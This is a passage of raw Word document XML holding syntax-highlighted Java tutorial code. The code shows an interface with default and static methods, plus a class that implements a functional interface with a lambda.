          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"This is a default method"</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A92FCCE" w14:textId="77777777" w:rsidR="00C023F6" w:rsidRPr="00C023F6" w:rsidRDefault="00C023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8730911"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F95023" w14:textId="77777777" w:rsidR="00C023F6" w:rsidRPr="00C023F6" w:rsidRDefault="00C023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8730911"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E843EBC" w14:textId="77777777" w:rsidR="00C023F6" w:rsidRPr="00C023F6" w:rsidRDefault="00C023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8730911"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Can have static methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52677AFA" w14:textId="77777777" w:rsidR="00C023F6" w:rsidRPr="00C023F6" w:rsidRDefault="00C023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8730911"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> staticMethod</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E5AA00" w14:textId="77777777" w:rsidR="00C023F6" w:rsidRPr="00C023F6" w:rsidRDefault="00C023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8730911"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"This is a static method"</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B7B265" w14:textId="77777777" w:rsidR="00C023F6" w:rsidRPr="00C023F6" w:rsidRDefault="00C023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8730911"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094391DB" w14:textId="77777777" w:rsidR="00C023F6" w:rsidRPr="00C023F6" w:rsidRDefault="00C023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8730911"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003F24C7" w14:textId="77777777" w:rsidR="00C023F6" w:rsidRPr="00C023F6" w:rsidRDefault="00C023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8730911"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11728BD6" w14:textId="77777777" w:rsidR="00C023F6" w:rsidRPr="00C023F6" w:rsidRDefault="00C023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8730911"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FunctionalInterfaceExample</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726B444B" w14:textId="77777777" w:rsidR="00C023F6" w:rsidRPr="00C023F6" w:rsidRDefault="00C023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8730911"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1827D842" w14:textId="77777777" w:rsidR="00C023F6" w:rsidRPr="00C023F6" w:rsidRDefault="00C023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8730911"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Using Lambda Expression to implement the abstract method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA00DF4" w14:textId="77777777" w:rsidR="00C023F6" w:rsidRPr="00C023F6" w:rsidRDefault="00C023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8730911"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MyFunctionalInterface</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> myFunction </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Doing something!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56442966" w14:textId="77777777" w:rsidR="00C023F6" w:rsidRPr="00C023F6" w:rsidRDefault="00C023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8730911"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF50D24" w14:textId="77777777" w:rsidR="00C023F6" w:rsidRPr="00C023F6" w:rsidRDefault="00C023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8730911"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Calling the abstract method using lambda</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4705E4CF" w14:textId="77777777" w:rsidR="00C023F6" w:rsidRPr="00C023F6" w:rsidRDefault="00C023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8730911"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        myFunction</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>doSomething</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
